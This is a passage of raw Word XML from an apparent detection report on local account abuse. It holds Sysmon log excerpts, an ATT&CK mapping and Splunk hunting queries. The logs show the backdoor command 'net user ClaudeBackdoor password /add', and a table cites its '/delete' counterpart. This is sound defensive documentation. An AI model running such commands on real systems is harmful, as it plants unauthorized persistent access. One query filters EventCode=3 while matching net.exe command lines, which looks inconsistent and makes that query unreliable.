          <w:p w14:paraId="32047EC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Sysmon Event 1 for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>net.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>net user ClaudeBackdoor /delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34AD6CF0">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Account deletion event, if auditing is enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="72C09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1976" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FB5B28E">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Account enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3083" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E6E5B9C">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>T1087.001 — Account Discovery: Local Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A966125">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon Event 1 for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>net.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> when used for enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68C20356">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Windows account events as available</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7636EBD9">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E941105">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Net.exe Account and Group Activity</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="96" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10159"/>
      </w:tblGrid>
      <w:tr w14:paraId="7875EE06">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10159" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="0C82BA4B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>index=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>internal  host="Sh-Win10" EventCode=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1103F94E">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search Image="*\\net.exe"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05BE3EF3">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search CommandLine="* user *" OR CommandLine="* localgroup *"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="106471A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">| table _time host User ParentImage ParentProcessId Image CommandLine ProcessGuid ProcessId IntegrityLevel </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65DBB82C">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C87774F">
      <w:pP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Account Creation (Event </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10130"/>
      </w:tblGrid>
      <w:tr w14:paraId="6DDD5056">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10130" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="334155" w:sz="8" w:space="0"/>
              <w:left w:val="single" w:color="334155" w:sz="8" w:space="0"/>
              <w:bottom w:val="single" w:color="334155" w:sz="8" w:space="0"/>
              <w:right w:val="single" w:color="334155" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1324"/>
          </w:tcPr>
          <w:p w14:paraId="54A19499">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UtcTime: 2026-09-24 13:14:32.513</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3666406F">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2491114A">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessGuid: {4736c562-2238-6ab5-2803-000000001c00}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE80FEF">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessId: 9752</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62EEF5A0">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DBE49B4">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image: C:\Windows\System32\net.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6064A5BC">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CommandLine: net user ClaudeBackdoor password /add</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62EDE385">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CurrentDirectory: C:\Users\saada\Downloads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D51050">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F48CE5E">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User: SH-WIN10\saad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="615CEE53">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IntegrityLevel: High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF3BF53">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53E8DC12">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AAA9AC3">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ClaudeBackdoor Account</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="96" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10052"/>
      </w:tblGrid>
      <w:tr w14:paraId="3951EDC4">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10052" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="5FE17A6F">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index=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">internal  host="Sh-Win10" EventCode=3 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67BB71B5">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search Image="*\\net.exe" CommandLine="*ClaudeBackdoor*"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DA3C788">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>| table _time host User ParentImage Image CommandLine ProcessGuid ProcessId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AB73BF2"/>
    <w:p w14:paraId="1A8A0401">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Local Administrator Group Membership</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">(Event </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="3D4B2EFB">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52A85B2D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UtcTime: 2026-09-24 13:15:31.821</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1310A782">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39F3F70C">
            <w:pPr>
